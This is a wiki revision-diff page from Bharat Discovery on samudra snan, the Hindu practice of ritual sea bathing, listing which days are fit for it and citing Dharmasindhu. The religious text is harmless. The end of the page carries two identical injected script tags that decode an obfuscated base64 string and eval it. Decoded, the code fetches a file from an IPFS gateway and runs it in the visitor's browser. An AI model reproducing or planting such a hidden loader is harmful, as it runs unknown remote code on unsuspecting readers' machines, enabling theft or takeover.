Difference between revisions of "समुद्र स्नान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[पूर्णिमा]] एवं [[अमावास्या]] जैसे पर्व दिनों पर समुद्र में स्नान करना चाहिए, किन्तु [[मंगलवार]] एवं [[शुक्रवार]] को नहीं।
+
*[[पूर्णिमा]] एवं [[अमावास्या]] जैसे पर्व दिनों पर समुद्र में [[स्नान]] करना चाहिए, किन्तु [[मंगलवार]] एवं [[शुक्रवार]] को नहीं।
 
*[[समुद्र]] एवं अश्वत्थ वृक्ष का सम्मान करना चाहिए, किन्तु उन्हें छूना नहीं चाहिए, किन्तु शनिवार को अश्वत्थ का स्पर्श किया जा सकता है।  
 
*[[समुद्र]] एवं अश्वत्थ वृक्ष का सम्मान करना चाहिए, किन्तु उन्हें छूना नहीं चाहिए, किन्तु शनिवार को अश्वत्थ का स्पर्श किया जा सकता है।  
 
*सेतु अर्थात् [[रामेश्वरम]] में स्नान करने के लिए काल सम्बन्धी कोई अवरोध नहीं है।<ref>धर्मसिन्धु (36)</ref>
 
*सेतु अर्थात् [[रामेश्वरम]] में स्नान करने के लिए काल सम्बन्धी कोई अवरोध नहीं है।<ref>धर्मसिन्धु (36)</ref>

Revision as of 14:43, 25 January 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • poornima evan amavasya jaise parv dinoan par samudr mean snan karana chahie, kintu mangalavar evan shukravar ko nahian.
  • samudr evan ashvatth vriksh ka samman karana chahie, kintu unhean chhoona nahian chahie, kintu shanivar ko ashvatth ka sparsh kiya ja sakata hai.
  • setu arthath rameshvaram mean snan karane ke lie kal sambandhi koee avarodh nahian hai.[1]

tika tippani aur sandarbh

  1. dharmasindhu (36)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>